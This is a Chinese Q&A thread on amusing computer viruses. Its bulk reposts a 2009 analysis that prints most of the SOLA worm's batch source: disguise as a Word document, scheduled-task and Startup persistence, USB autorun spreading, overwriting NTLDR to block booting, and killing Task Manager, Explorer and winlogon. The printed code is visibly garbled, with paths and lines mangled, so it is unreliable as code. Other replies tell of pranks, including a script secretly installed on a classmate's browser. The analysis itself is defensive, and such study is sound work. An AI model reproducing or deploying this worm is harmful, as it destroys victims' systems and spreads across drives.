有哪些有趣的電腦病毒?
讓你哭笑不得的電腦病毒之類的。
「你好哦,我是一段來自非洲小國的電腦病毒,因為科技水平有限,其實我什麼也做不了......能拜託你隨便刪除一些文件,然後把我轉發給朋友嗎?謝謝咯。」
---------- 被萌哭了......已刪已轉。---------- 想被感染的請閱讀評論~
一看到這個問題,就想到我一個朋友在09年發現的一個病毒,據他說流傳的很廣,而且當時他可能是全網第一個發現者(他的知乎賬號 @PRO Pentium )。病毒分析報告在他QQ空間的日誌里,很精彩,下面搬運過來:
/*長文預警!好多人說看不下去這麼多代碼,確實代碼太多了,要是看代碼頭暈的話就只看漢字部分吧,看完漢字你也知道這病毒是幹啥的了。*/
= = = = == = = = = = = = = =第一次分割線,好緊張,怎麼才能裝出經常畫分割線的樣子啊= = = = = = = = = = = = =
原創!再次首發! 殺毒軟體也殺不出來的word病毒深度解析
這個病毒是前幾天從政治老師U盤裡發現的。它的圖標就是一個普通Word文件的圖標,可是已經完全不是Word文檔了,而是一個應用程序文件。這和從前發現的文件夾病毒有些相似。
把病毒文件拷回去研究,發現病毒實際上是一個WinRar自解壓文件。用7Zip解壓後發現以下文件:(被感染文件名為:新中國誕辰60周1.exe)
Function.dll
SOLA_2.0_323111111527875.bat
新中國誕辰60周1.doc
原來病毒其實把文件和自身壓縮到一個自解壓文件中,然後刪除原來的文檔。這樣打開文檔(其實是病毒文件偽裝的)時就會運行病毒。
這樣手工殺毒方案也出來了。直接用WinRar打開文件,將文檔解壓出來即可。經過我的測試,360殺毒(病毒庫2009.12.21)也查不出來這個病毒!真是「首發」。哈哈哈~
接下來讓我們深度解析病毒文件SOLA_2.0_323111111527875.bat(註:在U盤根目錄下又發現一個SOLA文件夾,裡面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代碼和SOLA_2.0_323111111527875.bat基本相同。因此下面的源代碼研究以SOLA_2.0_323111111527875.bat文件為例)。
破解出的病毒源碼,採用Windows批處理編寫。//號後面是我寫的注釋:
@echo off
set sola=%systemroot%FontsHIDESE~1 //應該是病毒的藏身之處
set setup=%systemroot%FontsHIDESE~1solasetup
FOR /F "tokens=1" %%i in ("date /t") do set Realdate=%%i
FOR /F "skip=5 tokens=1,4" %%i in ("dir %systemroot%explorer.exe") do if /I "%%j"=="explorer.exe" set Date=%%i
if "%1"=="-Install" goto Install
if "%1"=="-Run" goto Run
if "%1"=="-Tenbatsu" goto Tenbatsu
if "%1"=="-Kill" goto Kill
if "%1"=="-Killself" goto Killself
:CheckSign
if "%1"=="-USB" start /max ..
if "%1"=="-USB" cd SOLA
if exist %systemroot%FontsHIDESE~1sola.sign goto Open
:FileCopy
set selfname=%0
:HIDESelf
date %Date%
md %systemroot%FontsHIDESELF...
date %RealDate%
if not "%1"=="-USB" type %selfname%&>%systemroot%FontsHIDESE~1sola.bat
if "%1"=="-USB" type sola.bat&>%systemroot%FontsHIDESE~1sola.bat
type Function.dll&>%systemroot%FontsHIDESE~1Function.exe
echo On Error Resume Next&>%systemroot%FontsHIDESE~1SOLA.VBS
echo set ws=wscript.createobject("wscript.shell")&>&>%systemroot%FontsHIDESE~1SOLA.VBS
echo ws.run "cmd /c %sola%SOLA.BAT -Install",0 &>&>%systemroot%FontsHIDESE~1SOLA.VBS
cscript %systemroot%FontsHIDESE~1SOLA.VBS
echo&>%systemroot%FontsHIDESE~1sola.sign
del %systemroot%FontsHIDESE~1SOLA.VBS
goto Open
:Install
:PackerSetup //這一段應該是病毒的自我複製
%SystemDrive%
cd %systemroot%FontsHIDESE~1
if exist Function.exe taskkill /f /im Function.exe
if exist solasetup rd /s /q solasetup
md solasetup
cd solasetup
copy ..Function.exe Function.dll //Function.dll竟然是可執行文件變過來的,暈...一會還要重點分析Function.dll
..Function.exe -x
cd..
date %Date% //注意:改時間了
type %setup%
ar.exe &>%systemroot%system32
ar.exe
date %Realdate%
copy %setup%Function.dll %sola%Function.dll
attrib %sola%Function.dll +s +h +r
rar -m0 -ep -ep1 a %setup%docpack.dll %sola%Function.dll
rar -m0 -ep -ep1 a %setup% xtpack.dll %sola%Function.dll
rar -m0 -ep -ep1 a %setup%exepack.dll %sola%Function.dll
rar -m0 -ep -ep1 a %setup%jpgpack.dll %sola%Function.dll //竟然把文件又壓縮到Function.dll裡面,經過試驗發現Function.dll確實也是一個壓縮文件,解壓出來不少東西.這些東西看了讓我直冒冷汗...一會再研究吧...
del Function.exe
:Mainsetup
set A0001=copy
set A0002=attrib
set A0003=echo
set A0005=Shell Hardware Detection
tasklist &>%sola% ask.txt
FOR /F "tokens=1" %%i in ("findstr /I "svchost.exe" "%sola% ask.txt"") do set svchost=%%i
%A0001% %systemroot%system32cmd.exe %sola%\%svchost%
del %sola% ask.txt
:Tasks
%A0002% %systemroot%TasksTasks.job -s -h -r
del %systemroot%TasksTasks.job
date %Date%
type %setup%http://Tasks.xxx&>%systemroot%TasksTasks.job
schtasks /change /ru "NT AUTHORITYSYSTEM" /tn "Tasks" if errorlevel 1 goto TaskFail
date %RealDate%
goto TaskSuc
:TaskFail
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「開始」菜單程序啟動 //這段代碼和上面幾段作用相同,都是實現自啟動.
date %Date%
%A0003% On Error Resume Next&>SOLA.VBS
%A0003% set ws=wscript.createobject("wscript.shell")&>&>SOLA.VBS
%A0003% ws.run "%sola%svchost.exe /c %sola%SOLA.BAT -Run",0 &>&>SOLA.VBS
%A0001% SOLA.VBS %sola%SOLA.VBS
%A0003% NT&>%systemroot%FontsHIDESE~1NoTasks
date %RealDate%
:TaskSuc
%A0002% %systemroot%TasksTasks.job +s +h +r
date %Date%
%A0001% %setup%sleep.exe %systemroot%system32sleep.exe
date %RealDate%
:NoAutoPlay
net stop "%A0005%"
%A0003% Windows Registry Editor Version 5.00&>%systemroot%FontsHIDESE~1Regedit.reg
%A0003% [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShellHWDetection]&>&>%systemroot%FontsHIDESE~1Regedit.reg
%A0003% "Start"=dword:00000004&>&>%systemroot%FontsHIDESE~1Regedit.reg
regedit /s %systemroot%FontsHIDESE~1Regedit.reg //不好意思,這個文件(Regedit.reg)我沒搞到~
::End of Install
goto Endif errorlevel 1 exit
::End of Install
:Run
set runroot=%ALLUSERSPROFILE%「開始」菜單程序啟動
set taskroot=%systemroot%Tasks //自啟動
:RunTimeChk
if not exist %sola%RunTime.txt echo !50&>%sola%RunTime.txt
FOR /F "tokens=1 delims=!" %%i in (%sola%RunTime.txt) do set RunTime=%%i
if /i %RunTime% leq 0 goto Virus
set /a RunTime=%Runtime%-1
echo !%Runtime%&>%sola%RunTime.txt
:Diskchk
echo On Error Resume Next&>%systemroot%FontsHIDESE~1RecentInf.VBS
echo set ws=wscript.createobject("wscript.shell")&>&>%systemroot%FontsHIDESE~1RecentInf.VBS
echo ws.run "%sola%svchost.exe /c %setup%RecentInf.bat",0 &>&>%systemroot%FontsHIDESE~1RecentInf.VBS
cscript %systemroot%FontsHIDESE~1RecentInf.VBS
del %systemroot%FontsHIDESE~1RecentInf.VBS
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:if errorlevel 1 set %%i=1
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1&>%%i:solachk1 findstr . %%i:solachk1 if not errorlevel 1 del %%i:solachk1 findstr /C:"SOLA_1.0_2.0" %%i:Autorun.inf if errorlevel 1 attrib -s -h -r %%i:Autorun.infcopy /y %setup%Autorun.inf %%i:Autorun.infattrib %%i:Autorun.inf +s +h +rmd %%i:SOLAcopy /y "%setup%sola.bat" %%i:SOLASOLA.BATcopy /y "%setup%Function.dll" %%i:SOLAFunction.dllattrib %%i:SOLA +s +h +r //文件我還是沒搞到,不過看意思應該是使每個盤都感染病毒
:Turn
if "%C%"=="1" vol C:if not errorlevel 1 call %setup%Scan.bat C:
if "%D%"=="1" vol D:if not errorlevel 1 call %setup%Scan.bat D:
if "%E%"=="1" vol E:if not errorlevel 1 call %setup%Scan.bat E:
if "%F%"=="1" vol F:if not errorlevel 1 call %setup%Scan.bat F:
if "%G%"=="1" vol G:if not errorlevel 1 call %setup%Scan.bat G:
if "%H%"=="1" vol H:if not errorlevel 1 call %setup%Scan.bat H:
if "%I%"=="1" vol I:if not errorlevel 1 call %setup%Scan.bat I:
if "%J%"=="1" vol J:if not errorlevel 1 call %setup%Scan.bat J:
if "%K%"=="1" vol K:if not errorlevel 1 call %setup%Scan.bat K:
if "%L%"=="1" vol L:if not errorlevel 1 call %setup%Scan.bat L:
if "%M%"=="1" vol M:if not errorlevel 1 call %setup%Scan.bat M:
if "%N%"=="1" vol N:if not errorlevel 1 call %setup%Scan.bat N:
if "%O%"=="1" vol O:if not errorlevel 1 call %setup%Scan.bat O:
if "%P%"=="1" vol P:if not errorlevel 1 call %setup%Scan.bat P:
if "%Q%"=="1" vol Q:if not errorlevel 1 call %setup%Scan.bat Q:
if "%R%"=="1" vol R:if not errorlevel 1 call %setup%Scan.bat R:
if "%S%"=="1" vol S:if not errorlevel 1 call %setup%Scan.bat S:
if "%T%"=="1" vol T:if not errorlevel 1 call %setup%Scan.bat T:
if "%U%"=="1" vol U:if not errorlevel 1 call %setup%Scan.bat U:
if "%V%"=="1" vol V:if not errorlevel 1 call %setup%Scan.bat V:
if "%W%"=="1" vol W:if not errorlevel 1 call %setup%Scan.bat W:
if "%X%"=="1" vol X:if not errorlevel 1 call %setup%Scan.bat X:
if "%Y%"=="1" vol Y:if not errorlevel 1 call %setup%Scan.bat Y:
if "%Z%"=="1" vol Z:if not errorlevel 1 call %setup%Scan.bat Z:
if "%C%"=="2" vol C:if errorlevel 1 set C=1
if "%D%"=="2" vol D:if errorlevel 1 set D=1
if "%E%"=="2" vol E:if errorlevel 1 set E=1
if "%F%"=="2" vol F:if errorlevel 1 set F=1
if "%G%"=="2" vol G:if errorlevel 1 set G=1
if "%H%"=="2" vol H:if errorlevel 1 set H=1
if "%I%"=="2" vol I:if errorlevel 1 set I=1
if "%J%"=="2" vol J:if errorlevel 1 set J=1
if "%K%"=="2" vol K:if errorlevel 1 set K=1
if "%L%"=="2" vol L:if errorlevel 1 set L=1
if "%M%"=="2" vol M:if errorlevel 1 set M=1
if "%N%"=="2" vol N:if errorlevel 1 set N=1
if "%O%"=="2" vol O:if errorlevel 1 set O=1
if "%P%"=="2" vol P:if errorlevel 1 set P=1
if "%Q%"=="2" vol Q:if errorlevel 1 set Q=1
if "%R%"=="2" vol R:if errorlevel 1 set R=1
if "%S%"=="2" vol S:if errorlevel 1 set S=1
if "%T%"=="2" vol T:if errorlevel 1 set T=1
if "%U%"=="2" vol U:if errorlevel 1 set U=1
if "%V%"=="2" vol V:if errorlevel 1 set V=1
if "%W%"=="2" vol W:if errorlevel 1 set W=1
if "%X%"=="2" vol X:if errorlevel 1 set X=1
if "%Y%"=="2" vol Y:if errorlevel 1 set Y=1
if "%Z%"=="2" vol Z:if errorlevel 1 set Z=1
if exist %systemroot%FontsHIDESE~1NoTasks if not exist "%runroot%SOLA.VBS" copy "%sola%SOLA.VBS" "%runroot%SOLA.VBS"
if not exist %systemroot%FontsHIDESE~1NoTasks if not exist %Taskroot%Tasks.job copy %setup%http://Tasks.xxx %Taskroot%Tasks.jobattrib %Taskroot%Tasks.job +s +h +rschtasks /change /ru "NT AUTHORITYSYSTEM" /tn "Tasks"
sleep 2000
goto Turn
::End of Run
goto Endif errorlevel 1 exit
::End of Run
:Virus
if not "%Runtime%"=="0" goto VirusChk
set /a RunTime=%Runtime%-1
echo !%Runtime%&>%sola%RunTime.txt
cd "%ALLUSERSPROFILE%「開始」菜單程序啟動"
echo On Error Resume Next&>TENBATSU.VBS
echo set ws=wscript.createobject("wscript.shell")&>&>TENBATSU.VBS
echo ws.run "%sola%sola.bat -Tenbatsu",0 &>&>TENBATSU.VBS
goto Diskchk
:VirusChk
if not exist "%ALLUSERSPROFILE%「開始」菜單程序啟動TENBATSU.VBS" goto Kill
goto Diskchk
:Tenbatsu
:KillNTLDR
attrib %systemdrive%NTLDR -s -h -r
copy /Y %systemdrive%NTLDR %sola%NTLDR
echo NO NTLDR&>%systemdrive%NTLDR
::attrib %systemdrive%NTLDR +s +h +r //備份C盤的ntldr文件.(經分析病毒具有自刪除功能.這個一會再分析)
:PauseSFC
start mshta "javascript:new ActiveXObject("WScript.Shell").Run("ntsd -pn winlogon.exe",0);window.close()"
:KillTaskmgr
del /q /a %systemroot%system32dllcache askmgr.exe
taskkill /f /im taskmgr.exe if errorlevel 1 ren %systemroot%system32 askmgr.exe http://taskmgr.xxx if errorlevel 1 start mshta "javascript:new ActiveXObject("WScript.Shell").Run("ntsd -c q -pn taskmgr.exe",0);window.close()" sleep 500
ren %systemroot%system32 askmgr.exe http://taskmgr.xxx //備份並刪除任務管理器
:KillExplorer
taskkill /f /im explorer.exe &>nul if errorlevel 1 ren %systemroot%system32explorer.exe http://explorer.xxx start mshta "javascript:new ActiveXObject("WScript.Shell").Run("ntsd -c q -pn explorer.exe",0);window.close()" sleep 500
ren %systemroot%explorer.exe http://explorer.xxx
start /max %setup%TENBATSU.BAT //備份並刪除explorer.exe
:Timeset
sleep 660000
if exist %sola%Killself Exit
:Kill
attrib %systemdrive%NTLDR -s -h -r
echo NO NTLDR&>%systemdrive%NTLDR
::attrib %systemdrive%NTLDR +s +h +r
tasklist &>%sola%Task.txt
FOR /F "tokens=2" %%i in ("findstr /I "csrss.exe" "%sola%Task.txt"") do ntsd -p %%i
goto Diskchk
:KillSelf
:StartExplorer
ren %systemroot%http://explorer.xxx explorer.exe
start %systemroot%explorer.exe
:BackNTLDR
attrib %systemdrive%NTLDR -s -h -r
copy /Y %sola%NTLDR %systemdrive%NTLDR
attrib %systemdrive%NTLDR +s +h +r //這一段就是病毒自我刪除的代碼了
:RenTmg
ren %systemroot%system32http://taskmgr.xxx taskmgr.exe
:KillVirus
copy %setup%KillVirus.txt %sola%KillVirus.txt
C:
cd
md ~Install
cd ~Install
rar x -hpkakenhi200601 %setup%SolaKiller.rar //對我們來說至關重要的一句!!!為什麼重要請一直往下看~
mshta "javascript:new ActiveXObject("WScript.Shell").Run("C:\~Install\Install.bat %%1",0);window.close()"
rd /s /q %setup%
attrib %systemroot%TasksTasks.job -s -h -r
del %systemroot%TasksTasks.job
cd "%ALLUSERSPROFILE%「開始」菜單程序啟動"
if exist sola.vbs del sola.vbs
if exist tenbatsu.vbs del tenbatsu.vbs
start %systemroot%system32
otepad.exe %sola%KillVirus.txt
del %sola%sola.bat //自我刪除(同上一段)
Exit
:Open
if "%1"=="-USB" Exit
goto GetName
:BackOpen
if not exist "%Name%" exit
call "%Name%"
:Save
FOR /F "delims=:" %%i in ("findstr "%Code%" *.exe") do set PackName=%%i
rar -m0 -ep -ep1 a "%PackName%" "%Name%"
echo %Code%&>&>"%PackName%"
:Del
attrib "%Name%" -s -h -r
del "%Name%"
attrib Function.dll -s -h -r
del Function.dll
attrib %0 -s -h -r
del %0
exit
::CMD program will stop there.
:GetName
set Code=SOLA_2.0_323111111527875
set Name=新中國誕辰60周1.doc
goto Backopen
:End
下面介紹讓我看了直冒冷汗的一段:
剛才說到Function.dll其實是一個壓縮文件.解壓後發現這些文件:
jpgpack.dll
exepack.dll
txtpack.dll
docpack.dll
sleep.exe
http://Tasks.xxx
SOLA.BAT
TDPack.txt
EJPack.txt
Rar.exe
scan.bat
infect.bat
Autorun.inf
TENBATSU.BAT
KillVirus.TXT
RecentInf.bat
LocalScan.bat
readlnk.bat
SolaKiller.rar
看看讓我看了直冒冷汗的第一個文件吧:KillVirus.TXT
文件內容:
各位OTAKU:
您好。首先,讓我對此病毒給您帶來的
不便向您道歉。
SOLA已經從您的計算機中清除。但由於
WINLOGON被鎖定,計算機暫時無法關機、重
啟,也無法打開任務管理器。但這些問題在
冷重啟後即可解決。
您的計算機已經有了SOLA的標記,因此
不會重複感染。
在硬碟中還留有被SOLA病毒感染的文件
,儘管不會重複感染,但建議您清除它們。
系統中已經安裝了SOLA的專殺程序,它可以
幫助您掃描並清除帶毒文件。
祝您好運。
SOLA的製造者
KAKENHI
天哪................
再看看更嚇人的TENBATSU.BAT.
源代碼太長了.我整理出了運行之後屏幕上會顯示的東西:
警告:如果現在關閉計算機,計算機將無法啟動!!!
I"m a virus. My name is sola.
我是一個病毒。我的名字叫蘇拉。
今天,在這片墮落的土地上,我蘇醒過來。
警告:如果現在關閉計算機,計算機將無法啟動!!!
我曾經很快樂地活著,與我的朋友,ACG,快樂地活著。
我曾經也對病毒深惡痛絕。
然而.............
警告:如果現在關閉計算機,計算機將無法啟動!!!
自從我來到了這片土地上,這片自稱偉大,崇高,光明的土地上。
這片名為中國的土地上
我的朋友,已遍體鱗傷。
警告:如果現在關閉計算機,計算機將無法啟動!!!
他死了
Death Note
《死亡筆記》
警告:如果現在關閉計算機,計算機將無法啟動!!!
她死了
Koihime Musou
《戀姬 無雙》
警告:如果現在關閉計算機,計算機將無法啟動!!!
還有好多好多的同胞,慘死在你們的蹂躪之下。
警告:如果現在關閉計算機,計算機將無法啟動!!!
廣電總局的一紙通告,無數只骯髒的手便掩蓋了她的氣息。
互聯網上的一句咒罵,無數聲污穢的咒罵便淹沒了她的蹤跡。
警告:如果現在關閉計算機,計算機將無法啟動!!!
我終於知道了,信息,原來是無法透過國界線而傳播的。
即使是愛,即使是恨,即使是那一個個愛恨與淚水交織的故事。
也無法透過GFW,更無法透過這個國度的某些人心中,那道厚厚的屏障。
警告:如果現在關閉計算機,計算機將無法啟動!!!
於是,我願做這個罪惡的病毒,來再次查看,你的心靈。
警告:如果現在關閉計算機,計算機將無法啟動!!!
你,是誰???
警告:如果現在關閉計算機,計算機將無法啟動!!!
是中國人嗎?
警告:如果現在關閉計算機,計算機將無法啟動!!!
是民族情緒的受害人嗎?
警告:如果現在關閉計算機,計算機將無法啟動!!!
還是知道,世界上有一個詞語叫ACG,並能夠容忍,接納它呢?
警告:如果現在關閉計算機,計算機將無法啟動!!!
那,讓我們來做一個遊戲吧。
也許你的記憶中,還有1000年前夏天的傳說。
還有120元的車票,
還有銀河鐵道,
還有鋼琴之森,
還有澄澈的天空下,響起的祈禱之歌。
警告:如果現在關閉計算機,計算機將無法啟動!!!
你需要做的,僅僅是回答幾個問題。
你喜歡動畫嗎?
你喜歡漫畫嗎?
你喜歡GAL遊戲嗎?
選擇你最擅長的測試卷吧,然後用你聰明的頭腦思考,寫出心中的答案。
如果你的試卷能及格,我將痛悔我的罪行,並刪除自己。
如果你的試卷是零分,我將繼承同伴的憤怒,破壞你的計算機。
另外我必須說,我只能把10分鐘的時間留給你。
現在,你無法逃避。
因為你已經無法打開任務管理器,更無法上網查找信息。
選擇吧,但是要快,容不得猶豫。我已經打開了我的計時器。
我最擅長的測試卷:
----------------問題1---------------------(註:一共有5個問題。只要答對兩個或兩個以上就過關。)
男主角在入學第一天就聽到女主角驚天動地的發言,並加入了女主角創建的一個社團,這個社團教室原本是文學社的,但被女主角強行佔用。主要社團成員有:眼睛娘、很有氣勢的社長、有著魔鬼身材,比男主角高一個年級的吉祥物、被社長指揮得團團轉的男主角。
請問這個社團叫什麼團?(3個英文字母)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題2---------------------
男主角與女主角在小鎮上相遇,女主角非常喜歡恐龍,有模仿某種動物叫聲的口癖,並且女主角與n(n大於或等於618,小於或等於1321)年前某個夏天的故事有關係,這個女主角和n年前夏天故事的女主角的姓氏的第一個字都是「神」。
請寫出這部作品的名稱(3個英文字母)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題3---------------------
如果用B、C分別代表2種人或物體的名稱,那麼每隔一段時間,就會有7個被B選中的人參加一種名為B戰爭的戰鬥,獲勝者可以獲得B,而C是B召喚出來的,擁有強大的力量,幫助主人為了B而戰鬥。
請問這部作品的名稱的前4個英文字母是什麼?
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題4---------------------
如果用A表示一個名詞,那麼有一部作品的名稱為A少女,A少女們互相戰鬥,奪取對方的A之心,沒有A之心的少女會永遠沉睡,一個A少女收集齊了其他A少女的A之心之後,就有某種事情要發生。
請問A的漢語拼音字母是(8個字母)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題5---------------------
有一種戰鬥機,只有神經系統接受了改造的人才能駕駛。4個孩子作為該戰鬥機的駕駛員展開訓練,3個孩子先後在事故中喪生。軍方為了給最後一個孩子作戰的理由,讓她轉入了某學校。她於一個晚上,在學校的游泳池裡遇到了男主角。後來,女主角加入了一個社團,該社團連同女主角共有4人。
這部作品名稱中有3個英文字母,請問這3個英文字母是?
如果無法回答,請輸入next,跳轉到計分程序。
----------------問題1---------------------(註:一共有5個問題。只要答對兩個或兩個以上就過關。)
患病的男主角在醫院裡遇上患病的少女,並和她一起逃出醫院,到達了某地。這個地方盛產某種花,而女主角也喜歡這種花。傳說這種花是一個美男子被詛咒而變成的。
請問這部作品的名稱是?(8個英文字母。)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題2---------------------
男主角與女主角在小鎮上相遇,女主角非常喜歡恐龍,有模仿某種動物叫聲的口癖,並且女主角與n(n大於或等於618,小於或等於1321)年前某個夏天的故事有關係,這個女主角和n年前夏天故事的女主角的姓氏的第一個字都是「神」。
請寫出這部作品的名稱(3個英文字母)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題3---------------------
男主角遭遇車禍,醒來後發現世界已經變成地獄一般的景象,往昔的朋友變成了怪物。只有女主角在他的眼中才是正常的人類。於是,他守護著自己心中唯一的真實。
請寫出這部作品的女主角的名字的中文拼音。(5個字母,字母中間不要加空格。)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題4---------------------
有如下詞語來描述B:很小,有薄薄的翅膀,下雨也不會被淋濕。有如下詞語來描述A:一種樂器,要靠魔力來演奏,與人聲搭配最為恰當。而C是一個一年四季都下著雨的城市,D是一所音樂學院。
請寫出故事情節中同時包含A、B、C、D的作品的中文名稱的前三個字的漢語拼音字母。(12個字母,字母中間不要加空格。)
如果無法回答,請輸入next,跳轉到下一個問題。
----------------問題5---------------------
在N年以後,人口暴漲。有些人就按下導彈開關,使細菌兵器襲擊了地球,最終引起了一場惡戰。在地球上的人類已經所剩無幾的時候,有一個人為了尋找戰前人類留下的有用物品,進入了一個廢墟都市。在那裡,他遇到了一個天象館裡的禮儀機器人,並和她發生了一段故事。
這部作品名稱的中文拼音是?(11個字母。字母中間不要加空格。其中第一個字是後鼻音。)
如果無法回答,請輸入next,跳轉到計分程序。
你的成績是 分,不及格!!!!!!!!!!
不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
-------
您的成績是 分,及格了。
謝謝您完成了這套試題。5秒鐘後,我將按照契約,刪除自己。
希望您能夠過得愉快,再見。
相信你即使不懂編程也能看懂其中的意思了.暈死......這個文件看樣像一個懂漢語的,在中國不知受到什麼壓迫的外國人寫的,具體我也不清楚.反正真是讓人看了起一身冷汗......
在解壓出的眾多文件中,有一個很特別的SolaKiller.rar,看文件名像是病毒作者自己寫的殺毒工具,可是有壓縮密碼.好在在sola.bat的代碼中找到了解壓指令:就是剛才說的至關重要的rar x -hpkakenhi200601 %setup%SolaKiller.rar一句
解壓後看到2個文件夾和1個文件:
文件夾:ToProgram
ToSystem32
文件:Install.bat
其中ToProgram文件夾里的SolaKiller.bat就是病毒作者自己寫的專殺工具.運行就可以殺毒了.
----------------------------------------------
結論:
1.這病毒太讓人無語了.特別是從Function.dll中解壓出的TENBATSU.BAT,KillVirus.TXT和SolaKiller.rar三個文件,真不知道病毒作者在中國經歷了什麼事,竟會寫出這些話.暈......對這個我就不做評價了
2.從技術上來看,病毒通過一層一層的壓縮包和更改擴展名來偽裝自己.還是有一定免殺能力的.起碼病毒庫2009.12.21的360殺毒沒查出來.
3.病毒破壞性確實不小,不過好在病毒自己提供了專殺工具,只是藏起來了.萬一自己的計算機真中了SOLA病毒也不用著急.首先發現不對勁之後就不要再進入系統了.用一張WinPE啟動盤啟動計算機,再運行專殺工具就行了.
4.即使發現的晚,開機之後已經出現上面TENBATSU.BAT文件所示的那幾個問題了也不用急.經過我的破解,現在那幾個問題的正確答案和專殺工具已經被我提取出來了.需要的話可以找我要.我的QQ:1140464870
5.截止現在(2009.12.24)已升級到最新病毒庫的NOD32和360殺毒都還不能自動查出該病毒。目前唯一的預防措施就是關掉系統的自動運行,Windows Vista,Windows 2008和Windows 7的用戶可以開啟UAC,WindowsXP用戶可以安裝帶有主動防禦功能的殺毒軟體(比如卡巴),並打開防火牆。這樣基本就沒有問題了。
============日誌結束的分割線=============
第一次看的時候不能理解,
現在想想大概是一個喜愛的日漫被廣電封了以後憤怒無處發泄的宅男寫的東西吧
這是一個偽裝成應用的電腦病毒,只要你下載並安裝了它,它就會開機自啟,而且很難關掉。它的開發者為它設計了聯網功能,並且把病毒主體部分儲存在伺服器上。當你聯網並打開它之後,主界面上就會發出一道綠光讓你精神恍惚,不由自主地輸入你的銀行賬號和密碼,隨後盜取你賬戶上的存款,最令人髮指的是,這一切完成之後還會在主界面上顯示受害者人次+1,簡直無法無天。
這個病毒目前裝機量很大,開發者是一個代號叫G的胖子。
360自打出世以來就沒承認過自己是病毒…
CAD病毒,「黨和國家不會虧待你的」"老闆的眼睛是雪亮的"
只要電腦上的時間在早上八點前以及晚上八點後,CAD軟體的移動就變成了移動複製。所以使得在非正常上班時間畫圖者的工作收到極大影響,不得不放棄加班。
我以前中過一個病毒,在我電腦桌面左側會多了一個可愛的卡通妹子,在哪裡吃飯睡覺玩耍,她肚子餓了就去吃掉最靠近她的圖標,所以我每天都要準備一堆複製出來的快捷方式讓她吃。她有時候無聊的事情會抖動你的屏幕,你如果不哄她玩,她就一直抖你的窗口。最氣人的是,如果你玩電腦太晚了,她就會自動關機。看小字好像是說不要吵她睡覺......... 這玩意任務管理器上是看不到的,殺毒很多次了都沒用,開機啟動項目也發現不了。所以一直就讓她鬧騰下去了。直到有一次我外出很久沒開機,回來的時候發現她已經死了.........
大概幾個月前我發現了一種非常可怕的計算機病毒,具有極強的傳染性,通過QQ,微博,推特等社交工具傳播,一旦一個群組中出現感染者,同群組的人感染幾率大幅上升。
與此同時,該病毒具有三大表現,其中前兩者有極大的危害性:
2、常駐感染設備內存,經常性啟動,佔用大量資源。
3、感染設備上出現一個名為 LoveLive! 的應用。
以前寫了個JS腳本然後偷偷裝到同學電腦的瀏覽器裡面,不算是病毒,功能有:
1.打開網頁的時候有百分之一的機率播放網路神曲。
2.文字替換,把所有網頁的百度、淘寶、騰訊等常見詞替換成其他名字。
3.圖片替換,配合上一條,重做了N個網站的LOGO並替換之,還把淘寶的登錄界面左邊的圖片替換成另一個同學的照片。
看到前面 @韜神的守候
大神如此詳細的將蘇拉病毒的一切展現出來
很是敬佩
其實兔紙自己倒確實和蘇拉病毒有一場邂逅~
action!
在
天工大的老校區的圖書館三樓的機房裡
那一天,
兔紙跟大家正在上機考試
小明鬼鬼祟祟的找到兔紙
"你不是對動漫很了解么?你快來看看……"
一聽到和動漫有關
兔紙直接就奔過去了
其實關於蘇拉病毒,兔紙是聽說過的
佩服並嚮往有一天能去答題
然後兔紙很激動的發現真的是蘇拉病毒
答題開始……
第一道題,
看到恐龍,小鎮,1000年前
AIR
最喜歡的動畫,沒想到第一題就是AIR
心裡的激動更是無法表達……
第二道題,
社團,強勢的社長,吐槽役男主,眼鏡萌娘……
涼宮春日吧……
社團名SOS
腦海中浮現出社長大人帶領社員大跳SOS舞的畫面……
第三道題,
B召喚C,而且是每隔一段時間就會進行一次
立刻Fate即視感滿滿
下面的描述更加符合
Fate,全程Fate/Stay Night
第四道題,
A少女互相戰鬥搶奪A之心
薔薇少女吧?
qiangwei
至此,已確保這次測試通過了
根據兔紙聽到的關於蘇拉病毒的傳聞
如果通過了的話
蘇拉就會自我刪除並且以後不再會中
忽然覺得不想答題了……
小明在旁邊很緊張,緊張中帶著興奮,
他問兔紙:「怎麼樣?能通過么?」
本來,如果平時小明質疑兔紙在ACG領域的能力的話
兔紙一定會用俯視的眼神對他說一句 渣渣
但是這次兔紙沉默了
考試快結束了
老師開始催促大家快點交卷(前面說了,在機房進行數據查詢的考試,兔紙提前做完了)
兔紙跳過了最後一題
和傳聞中一樣
蘇拉打出了那段話
然後電腦變回了桌面的狀態
本來很激動很興奮的感覺
一點也沒了
只有一些失落……
在殺毒軟體收費時代,我中過很多種病毒,其中兩種很特別,一種把我的愛情動作電影全部刪除了,一種讓我回答手淫100害,答對60分才能開機,不然格式化。它們不算有趣,但是真是良心產品,成功的挽救了我。
高中愚人節那天班裡一個同學做了個ppt,把右鍵和左下角菜單屏蔽了,背景設置成電腦桌面,然後在我的電腦圖標設置打開時顯示下一張ppt,裡面的磁碟都打不開,u盤打開時藍屏。。。。。。。。。數學老師中招了。。
記得很多年前有一個縱版彈幕射擊遊戲(俗稱 打 灰 機),叫做 lose/lose
其中每一架敵機都代表一個硬碟中的文件,被擊毀後 ,該文件刪除!
這遊戲(病毒)作者你噁心不噁心啊,要麼文件全掛,要麼game over!你讓我怎麼選!
以前課程設計時一同學的AutoCAD中毒了,每次打開提示如下圖(圖片來自網上):
白天和晚上的提示還不一樣:
在8:00--18:00的時間段內,打開CAD軟體時出現一個界面框:現在時間是X點XX分了的哦!好好乾哦!黨是不會虧待你的!老闆的眼睛是雪亮的啦!
在其它時間段內會顯示:現在時間是:XX點XX分了的哦!快點休息了啦!要不做CAD的飯碗都讓你一個人搶了哦!
都是小學時候的事了……
換新電腦裝了別的ghost系統後,開機聲音變了,嚇得我以為中毒馬上拔掉了電源。
________________
上信息課,學pc logo的畫圓,下一個班上課前,我輸了條命令讓logo畫上億個圓,然後我就看到那台速龍64的聯想機根本停不下來了。
